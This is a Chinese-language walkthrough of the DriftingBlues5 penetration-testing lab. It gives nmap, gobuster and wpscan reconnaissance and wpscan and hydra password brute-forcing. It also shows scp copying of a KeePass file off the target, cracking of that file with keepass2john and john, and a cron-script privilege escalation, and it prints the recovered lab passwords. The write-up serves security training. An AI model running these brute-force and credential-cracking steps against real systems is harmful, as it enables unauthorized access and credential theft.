OSCP 靶场
靶场介绍
|
driftingblues5 |
easy |
wordpress、wpscan爆破、图片隐写、keepass2john工具使用、john爆破keyfile、keepass使用、任务计划分析排查、pspy64使用、linpeas使用、 |
信息收集
主机发现
nmap -sn 192.168.1.0/24端口扫描
端口扫描只有两个端口ssh 和 WordPress 6.4.2
└─# nmap -sV -A -p- -T4 192.168.1.188
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-27 01:22 EST
Nmap scan report for 192.168.1.188
Host is up (0.0029s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
| 256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
|_ 256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-generator: WordPress 6.4.2
|_http-title: diary – Just another WordPress site
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:3D:A0:3A (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
目录扫描
gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.1.188 -x php,txt,html -e
http://192.168.1.188/wp-content/uploads/2021/02/这里仔细一点会发现有一张图片是首页上没有展示出来的。先放着,稍后可能有用。
wpsan扫描
wpscan --url http://192.168.1.188
wpscan --url http://192.168.1.188 -eu
这里使用wpscan 扫描出来网站的几个用户名,
wpscan --url http://192.168.1.188 -U user.txt -P /usr/share/wordlists/rockyou.txt -t 50
上面爆破的半天都没有,先尝试制作一个密码本来爆破,没有的话在使用上面的字典爆破
cewl -d 2 -m 4 -w passwd.txt --with-numbers http://192.168.1.188/index.php
这里虽然登录成功了,但是没有管理员权限并不可以直接getshell
使用账号密码尝试登录ssh 也是失败了,下面找重新爆破一下ssh服务了。
hydra -L user.txt -P passwd.txt ssh://192.168.1.188 -t 20这里也是爆破失败了。
权限获取
常用的方法尝试失败后,查看图片居然还有隐写内容,直接发现密码
接下来进行密码喷射,还是gill 账号的密码
权限提升
用户根目录下还有一个keyfile.kdbx文件,该文件是KeePass密码管理器安全创建的数据文件称为KDBX文件,.kdb是自己创建的密码库,里面可以添加保存一些你的账号密码,并且这个密码库也有自己的密码。更多了解可参考:https://www.cnblogs.com/stxs/p/8675123.html
我们先将该文件下载到本地,命令:
scp -rp [email protected]:/home/gill/keyfile.kdbx /tmp
或者使用
php -S 0.0.0.0:9999
python3 -m http.serverkeepass工具下载:https://keepass.info/download.html这里还需要密码
利用keepass2john工具获取其hash值,然后进行爆破,命令如下
keepass2john keyfile.kdbx > hash接着进行爆破,命令如下:
john --wordlist=/usr/share/wordlists/rockyou.txt hash爆破成功获得密码为:porsiempre
打开后,里面密码是隐藏了,我以为有root 的账号密码,还是想简单了。到这里思路还是断了。
查看任务计划,这里发现root 存在一个任务计划。但是没有权限查看,所以只能通过pspy64进行
cat /var/spool/cron/*
使用linpeas.sh 脚本还发现了这个文件夹。
这里看了网上的write-up,终于做出来。这里是需要我们在/keyfolder目录中创建新文件,并且文件名应该是我们刚刚找到的 keepas 中的名称。
原理是这个脚本将密码写入到了刚才keepass发现的几个标题那里去了,然后在/keyfolder目录下创建刚才的几个标题,但是没什么变化,后来就一个一个单独创建,在创建fracturedocean文件时,多出来一个rootcreds.txt文件,读取该文件获得root密码信息:imjustdrifting31。
最后可以看到key.sh 这个脚本就完全明白了。他是定期去脚本keyfolder 这个文件夹下是否有这个文件,如果有的话就写入密码。
End
“点赞、在看与分享都是莫大的支持”
原文始发于微信公众号(贝雷帽SEC):【OSCP】driftingblues5
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论